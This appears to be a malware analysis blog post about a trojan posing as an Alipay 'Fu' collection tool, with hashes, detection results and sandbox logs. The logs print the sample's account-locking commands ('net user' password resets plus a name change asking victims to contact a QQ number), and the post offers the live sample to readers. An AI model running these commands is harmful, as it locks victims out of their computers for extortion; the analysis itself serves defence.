Source Analysis of the "Alipay Fu-Collection Enhancement Tool" (支付宝集福增强工具)
The Alipay Fu-collection enhancement tool is a virus that 天哥, a virus author I know, wrote around Spring Festival a few years ago. It has no ability to spread on its own, but...
Curiosity killed the cat.
Today let's analyze it.
Thanks to the Tencent Habo analysis system (habo.qq.com) and the ThreatBook cloud sandbox (s.threatbook.cn) for their technical support.
Sample: reply 024 to the official account to get it.
File name: 支付宝集福增强工具.exe
SHA256: 9ec7316691b56ba703c70b624c6ef4cde47c14a881b4607fddf4a30a3234f01d
Test environment: win7_sp1_enx86_office2013
Sample type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Sample size: 17351168
MD5: dffe6e34209cb19ebe720c457a06edd6
SHA1: 5851b96dd37e24799a1eaf17778beb322d714a8b
SSDeep: 93216:34bE4rgyzGhTN9T7YtJXeeZyCefHFSSLyZHH:34b9R4j/SJXIdxyZHH
Packer or compiler info: PACKER: UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
Sample tags: Trojan, AddUser (account lock), PE32, lang_chinese
Multi-engine detection rate: 9/25
| Antivirus engine | Detection result |
|---|---|
| ESET | Win32/AddUser.BG trojan |
| Dr.Web | Trojan.Siggen7.57156 |
| Baidu | Trojan.QQThief.Heur.gen |
| AVG | Trojan horse Atros4.CGGW |
| Antiy | Trojan/Generic.ASSuf.21B96 |
| IKARUS | Trojan.Win32.AddUser |
| K7 | Trojan ( 005039391 ) |
| Avast | Win32:Malware-gen |
| Tencent | Win32.Trojan-qqpass.Qqrob.Wxry |
| Rising | Trojan.AddUser!8.E12 |
Threat intelligence IOCs
Behavior signatures
High-risk behaviors (2)
General behavior: shows interest in a specific running process (process: potential process injection target svchost.exe)
Modifies the desktop wallpaper:
registry: HKEY_CURRENT_USER\Control Panel\Desktop\Wallpaper
registry: HKEY_CURRENT_USER\Control Panel\Desktop\WallpaperStyle
registry: HKEY_CURRENT_USER\Control Panel\Desktop\TileWallpaper
Suspicious behaviors (6)
The binary may contain encrypted or compressed data and may be packed:

| Field | Value |
|---|---|
| section | name: "UPX1", virtual_address: "0x005e2000", virtual_size: "0x01074000", size_of_data: "0x01073c00", entropy: 7.88305649944682 |
| entropy | 7.88305649944682 |
| entropy | 0.9943046005842948 |

The executable is compressed with UPX:

| Field | Value |
|---|---|
| section | UPX0 |
| section | UPX1 |
System environment probing: repeatedly searches for a process that is never found

| Time | API | Arguments | Success | Return value |
|---|---|---|---|---|
| 2019-08-10 20:24:49 | Process32NextW | process_name: net1.exe, snapshot_handle: 0x000002a0, process_identifier: 3704 | 0 | 0 |
| 2019-08-10 20:24:49 | Process32NextW | process_name: net1.exe, snapshot_handle: 0x0000029c, process_identifier: 3728 | 0 | 0 |
| 2019-08-10 20:24:49 | Process32NextW | process_name: net1.exe, snapshot_handle: 0x000002a8, process_identifier: 3740 | 0 | 0 |
| 2019-08-10 20:24:49 | Process32NextW | process_name: is32bit.exe, snapshot_handle: 0x000002a4, process_identifier: 3760 | 0 | 0 |
| 2019-08-10 20:24:49 | Process32NextW | process_name: net1.exe, snapshot_handle: 0x000002ac, process_identifier: 3752 | 0 | 0 |
| 2019-08-10 20:24:49 | Process32NextW | process_name: conhost.exe, snapshot_handle: 0x000002b0, process_identifier: 3856 | 0 | 0 |
| 2019-08-10 20:24:49 | Process32NextW | process_name: conhost.exe, snapshot_handle: 0x000002b4, process_identifier: 3856 | 0 | 0 |
| 2019-08-10 20:24:49 | Process32NextW | process_name: inject-x86.exe, snapshot_handle: 0x000002b8, process_identifier: 3900 | 0 | 0 |
| 2019-08-10 20:24:50 | Process32NextW | process_name: conhost.exe, snapshot_handle: 0x000002bc, process_identifier: 4020 | 0 | 0 |
| 2019-08-10 20:24:50 | Process32NextW | process_name: net1.exe, snapshot_handle: 0x000002c0, process_identifier: 3752 | 0 | 0 |
| 2019-08-10 20:24:50 | Process32NextW | process_name: net1.exe, snapshot_handle: 0x000002c4, process_identifier: 3752 | 0 | 0 |
| 2019-08-10 20:24:50 | Process32NextW | process_name: sc.exe, snapshot_handle: 0x000002c8, process_identifier: 2104 | 0 | 0 |
| 2019-08-10 20:24:50 | Process32NextW | process_name: net1.exe, snapshot_handle: 0x000002cc, process_identifier: 3752 | 0 | 0 |
| 2019-08-10 20:24:50 | Process32NextW | process_name: net1.exe, snapshot_handle: 0x000002d0, process_identifier: 3752 | 0 | 0 |
| 2019-08-10 20:24:50 | Process32NextW | process_name: net1.exe, snapshot_handle: 0x000002d4, process_identifier: 3752 | 0 | 0 |
| 2019-08-10 20:24:50 | Process32NextW | process_name: net1.exe, snapshot_handle: 0x000002d8, process_identifier: 3752 | 0 | 0 |
| 2019-08-10 20:24:50 | Process32NextW | process_name: net1.exe, snapshot_handle: 0x000002dc, process_identifier: 3752 | 0 | 0 |
| 2019-08-10 20:24:50 | Process32NextW | process_name: inject-x86.exe, snapshot_handle: 0x000002e0, process_identifier: 2268 | 0 | 0 |
| 2019-08-10 20:24:51 | Process32NextW | process_name: inject-x86.exe, snapshot_handle: 0x000002e4, process_identifier: 2268 | 0 | 0 |
| 2019-08-10 20:24:51 | Process32NextW | process_name: net1.exe, snapshot_handle: 0x000002e8, process_identifier: 3752 | 0 | 0 |
| 2019-08-10 20:24:51 | Process32NextW | process_name: net1.exe, snapshot_handle: 0x000002ec, process_identifier: 3752 | 0 | 0 |
| 2019-08-10 20:24:51 | Process32NextW | process_name: net1.exe, snapshot_handle: 0x000002f0, process_identifier: 3752 | 0 | 0 |
| 2019-08-10 20:24:51 | Process32NextW | process_name: net1.exe, snapshot_handle: 0x000002f4, process_identifier: 3752 | 0 | 0 |
| 2019-08-10 20:24:51 | Process32NextW | process_name: net1.exe, snapshot_handle: 0x000002f8, process_identifier: 3752 | 0 | 0 |
| 2019-08-10 20:24:51 | Process32NextW | process_name: net1.exe, snapshot_handle: 0x000002fc, process_identifier: 3752 | 0 | 0 |
| 2019-08-10 20:24:51 | Process32NextW | process_name: inject-x86.exe, snapshot_handle: 0x00000300, process_identifier: 2476 | 0 | 0 |
| 2019-08-10 20:24:52 | Process32NextW | process_name: inject-x86.exe, snapshot_handle: 0x00000304, process_identifier: 2508 | 0 | 0 |
| 2019-08-10 20:24:52 | Process32NextW | process_name: inject-x86.exe, snapshot_handle: 0x00000308, process_identifier: 2508 | 0 | 0 |
| 2019-08-10 20:24:52 | Process32NextW | process_name: inject-x86.exe, snapshot_handle: 0x0000030c, process_identifier: 2508 | 0 | 0 |
| 2019-08-10 20:24:52 | Process32NextW | process_name: net1.exe, snapshot_handle: 0x00000310, process_identifier: 3752 | 0 | 0 |
| 2019-08-10 20:24:52 | Process32NextW | process_name: cmd.exe, snapshot_handle: 0x00000314, process_identifier: 2628 | 0 | 0 |
| 2019-08-10 20:24:52 | Process32NextW | process_name: conhost.exe, snapshot_handle: 0x00000318, process_identifier: 2632 | 0 | 0 |
| 2019-08-10 20:24:52 | Process32NextW | process_name: conhost.exe, snapshot_handle: 0x0000031c, process_identifier: 2632 | 0 | 0 |
| 2019-08-10 20:24:52 | Process32NextW | process_name: schtasks.exe, snapshot_handle: 0x00000320, process_identifier: 2572 | 0 | 0 |
| 2019-08-10 20:24:52 | Process32NextW | process_name: schtasks.exe, snapshot_handle: 0x00000324, process_identifier: 2572 | 0 | 0 |
| 2019-08-10 20:24:52 | Process32NextW | process_name: schtasks.exe, snapshot_handle: 0x00000328, process_identifier: 2572 | 0 | 0 |
| 2019-08-10 20:24:53 | Process32NextW | process_name: schtasks.exe, snapshot_handle: 0x0000032c, process_identifier: 2572 | 0 | 0 |
| 2019-08-10 20:24:53 | Process32NextW | process_name: schtasks.exe, snapshot_handle: 0x00000330, process_identifier: 2572 | 0 | 0 |
| 2019-08-10 20:24:53 | Process32NextW | process_name: schtasks.exe, snapshot_handle: 0x00000334, process_identifier: 2572 | 0 | 0 |
| 2019-08-10 20:24:53 | Process32NextW | process_name: schtasks.exe, snapshot_handle: 0x00000338, process_identifier: 2572 | 0 | 0 |
| 2019-08-10 20:24:53 | Process32NextW | process_name: schtasks.exe, snapshot_handle: 0x0000033c, process_identifier: 2572 | 0 | 0 |
| 2019-08-10 20:24:53 | Process32NextW | process_name: schtasks.exe, snapshot_handle: 0x00000340, process_identifier: 2572 | 0 | 0 |
| 2019-08-10 20:24:53 | Process32NextW | process_name: schtasks.exe, snapshot_handle: 0x00000344, process_identifier: 2572 | 0 | 0 |
| 2019-08-10 20:24:53 | Process32NextW | process_name: schtasks.exe, snapshot_handle: 0x00000348, process_identifier: 2572 | 0 | 0 |
| 2019-08-10 20:24:53 | Process32NextW | process_name: schtasks.exe, snapshot_handle: 0x0000034c, process_identifier: 2572 | 0 | 0 |
| 2019-08-10 20:24:54 | Process32NextW | process_name: net1.exe, snapshot_handle: 0x00000350, process_identifier: 3752 | 0 | 0 |
| 2019-08-10 20:24:54 | Process32NextW | process_name: net1.exe, snapshot_handle: 0x00000354, process_identifier: 3752 | 0 | 0 |
| 2019-08-10 20:24:54 | Process32NextW | process_name: net1.exe, snapshot_handle: 0x00000358, process_identifier: 3752 | 0 | 0 |
| 2019-08-10 20:24:54 | Process32NextW | process_name: net1.exe, snapshot_handle: 0x0000035c, process_identifier: 3752 | 0 | 0 |
| 2019-08-10 20:24:54 | Process32NextW | process_name: sc.exe, snapshot_handle: 0x00000360, process_identifier: 188 | 0 | 0 |
Scans the Windows taskbar (commonly used for injecting into explorer)

| Time | API | Arguments | Success | Return value |
|---|---|---|---|---|
| 2019-08-10 20:24:47 | FindWindowW | class_name: Shell_TrayWnd, window_name: (empty) | 1 | 65610 |
| 2019-08-10 20:24:47 | FindWindowW | class_name: Shell_TrayWnd, window_name: (empty) | 1 | 65610 |
| 2019-08-10 20:24:48 | FindWindowA | class_name: Shell_TrayWnd, window_name: (empty) | 1 | 65610 |
| 2019-08-10 20:24:48 | FindWindowA | class_name: Shell_TrayWnd, window_name: (empty) | 1 | 65610 |
| 2019-08-10 20:24:48 | FindWindowA | class_name: Shell_TrayWnd, window_name: (empty) | 1 | 65610 |
Enumerates processes or threads

| Time | API | Arguments | Success | Return value |
|---|---|---|---|---|
| 2019-08-10 20:24:48 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 664 |
| 2019-08-10 20:24:49 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 672 |
| 2019-08-10 20:24:49 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 668 |
| 2019-08-10 20:24:49 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 680 |
| 2019-08-10 20:24:49 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 676 |
| 2019-08-10 20:24:49 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 684 |
| 2019-08-10 20:24:49 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 688 |
| 2019-08-10 20:24:49 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 692 |
| 2019-08-10 20:24:49 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 696 |
| 2019-08-10 20:24:50 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 700 |
| 2019-08-10 20:24:50 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 704 |
| 2019-08-10 20:24:50 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 708 |
| 2019-08-10 20:24:50 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 712 |
| 2019-08-10 20:24:50 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 716 |
| 2019-08-10 20:24:50 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 720 |
| 2019-08-10 20:24:50 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 724 |
| 2019-08-10 20:24:50 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 728 |
| 2019-08-10 20:24:50 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 732 |
| 2019-08-10 20:24:50 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 736 |
| 2019-08-10 20:24:51 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 740 |
| 2019-08-10 20:24:51 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 744 |
| 2019-08-10 20:24:51 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 748 |
| 2019-08-10 20:24:51 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 752 |
| 2019-08-10 20:24:51 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 756 |
| 2019-08-10 20:24:51 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 760 |
| 2019-08-10 20:24:51 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 764 |
| 2019-08-10 20:24:51 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 768 |
| 2019-08-10 20:24:52 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 772 |
| 2019-08-10 20:24:52 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 776 |
| 2019-08-10 20:24:52 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 780 |
| 2019-08-10 20:24:52 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 784 |
| 2019-08-10 20:24:52 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 788 |
| 2019-08-10 20:24:52 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 792 |
| 2019-08-10 20:24:52 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 796 |
| 2019-08-10 20:24:52 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 800 |
| 2019-08-10 20:24:52 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 804 |
| 2019-08-10 20:24:52 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 808 |
| 2019-08-10 20:24:53 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 812 |
| 2019-08-10 20:24:53 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 816 |
| 2019-08-10 20:24:53 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 820 |
| 2019-08-10 20:24:53 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 824 |
| 2019-08-10 20:24:53 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 828 |
| 2019-08-10 20:24:53 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 832 |
| 2019-08-10 20:24:53 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 836 |
| 2019-08-10 20:24:53 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 840 |
| 2019-08-10 20:24:53 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 844 |
| 2019-08-10 20:24:54 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 848 |
| 2019-08-10 20:24:54 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 852 |
| 2019-08-10 20:24:54 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 856 |
| 2019-08-10 20:24:54 | CreateToolhelp32Snapshot | flags: 2, process_identifier: 0 | 1 | 860 |
Uses Windows utilities in place of basic Windows functionality
cmdline: net user Administrator 1224639518
cmdline: net user %username% 1224639518
cmdline: net user Administrator /fullname:要密码加QQ:1322856336
cmdline: net user %username% /fullname:要密码加QQ:1322856336
Abnormal PE section size
UPX1 (size_of_data 0x01073c00)
url: http://www.imagemagick.org
url: file:///home/wwwroot/site/www.easyicon.net/cdn-img.easyicon.cn/src/5716/571610.png
Retrieves system information

| Time | API | Arguments | Success | Return value |
|---|---|---|---|---|
| 2019-08-10 20:24:46 | GetSystemInfo | processor_count: 4 | 1 | 0 |
| 2019-08-10 20:24:47 | GetSystemInfo | processor_count: 4 | 1 | 0 |
| 2019-08-10 20:24:47 | GetSystemInfo | processor_count: 4 | 1 | 0 |
| 2019-08-10 20:24:47 | GetSystemInfo | processor_count: 4 | 1 | 0 |
| 2019-08-10 20:24:47 | GetSystemInfo | processor_count: 4 | 1 | 0 |
| 2019-08-10 20:24:47 | GetSystemInfo | processor_count: 4 | 1 | 0 |
| 2019-08-10 20:24:47 | GetSystemInfo | processor_count: 4 | 1 | 0 |
| 2019-08-10 20:24:47 | GetSystemInfo | processor_count: 4 | 1 | 0 |
| 2019-08-10 20:24:47 | GetSystemInfo | processor_count: 4 | 1 | 0 |
| 2019-08-10 20:24:47 | GetSystemInfo | processor_count: 4 | 1 | 0 |
| 2019-08-10 20:24:47 | GetSystemInfo | processor_count: 4 | 1 | 0 |
Output written to the command-line console

| Time | API | Arguments | Success | Return value |
|---|---|---|---|---|
| 2019-08-10 20:24:50 | WriteConsoleW | buffer: The user name could not be found. console_handle: 0x0000000b | 1 | 1 |
| 2019-08-10 20:24:50 | WriteConsoleW | buffer: More help is available by typing NET HELPMSG 2221. console_handle: 0x0000000b | 1 | 1 |
| 2019-08-10 20:24:51 | WriteConsoleW | buffer: The user name could not be found. console_handle: 0x0000000b | 1 | 1 |
| 2019-08-10 20:24:51 | WriteConsoleW | buffer: More help is available by typing NET HELPMSG 2221. console_handle: 0x0000000b | 1 | 1 |
| 2019-08-10 20:24:51 | WriteConsoleW | buffer: The command completed successfully. console_handle: 0x00000007 | 1 | 1 |
| 2019-08-10 20:24:51 | WriteConsoleW | buffer: The command completed successfully. console_handle: 0x00000007 | 1 | 1 |
| 2019-08-10 20:24:52 | WriteConsoleW | buffer: The command completed successfully. console_handle: 0x00000007 | 1 | 1 |
Creates files in the temporary directory

| Time | API | Arguments | Result |
|---|---|---|---|
| 2019-08-10 20:24:47 | NtCreateFile | create_disposition: 5, file_handle: 0x00000298, filepath: C:\Users\vbccsb\AppData\Local\Temp\sj.exe, desired_access: 0x40100080, file_attributes: 128, filepath_r: \??\C:\Users\vbccsb\AppData\Local\Temp\sj.exe, create_options: 96, status_info: 2, share_access: 0 | 10 |
| 2019-08-10 20:24:48 | NtCreateFile | create_disposition: 5, file_handle: 0x0000029c, filepath: C:\Users\vbccsb\AppData\Local\Temp\xh.exe, desired_access: 0x40100080, file_attributes: 128, filepath_r: \??\C:\Users\vbccsb\AppData\Local\Temp\xh.exe, create_options: 96, status_info: 2, share_access: 0 | 10 |
Finds and loads module resources

| Time | API | Arguments | Success | Return value |
|---|---|---|---|---|
| 2019-08-10 20:24:47 | LoadResource | module_handle: 0x00400000, resource_handle: 0x01a56cc8, pointer: 0x01a6d988 | 1 | 27711880 |
Creates executable files on the file system
file: C:\Users\vbccsb\AppData\Local\Temp\xh.exe
file: C:\Users\vbccsb\AppData\Local\Temp\sj.exe
Copyright: 支付宝集福工具
File version: 1.0.0.0
Company name: 支付宝集福工具
Comments: 支付宝集福工具
Product name: 支付宝集福工具
Product version: 1.0.0.0
File description: 支付宝集福工具
Language: Chinese (Simplified) - China
// The remaining items, as in the image above, are omitted.
Key behaviors

| Behavior description | Details |
|---|---|
| Modifies user passwords | ImagePath = , CmdLine = net user %username% /fullname:要密码加QQ:1322856336; ImagePath = , CmdLine = net user %username% 1224639518; ImagePath = , CmdLine = net user Administrator 1224639518; ImagePath = , CmdLine = net user Administrator /fullname:要密码加QQ:1322856336 |
| Kills a process | C:\WINDOWS\system32\taskmgr.exe |
| Captures window screenshot information | Foreground window Info: HWND = 0x0001035c, DC = 0x0b010502. Foreground window Info: HWND = 0x00000000, DC = 0x00000000. Foreground window Info: HWND = 0x0001035e, DC = 0x0b010502. |
| Kills the QQ process | C:\Program Files\Tencent\QQ\Bin\QQ.exe |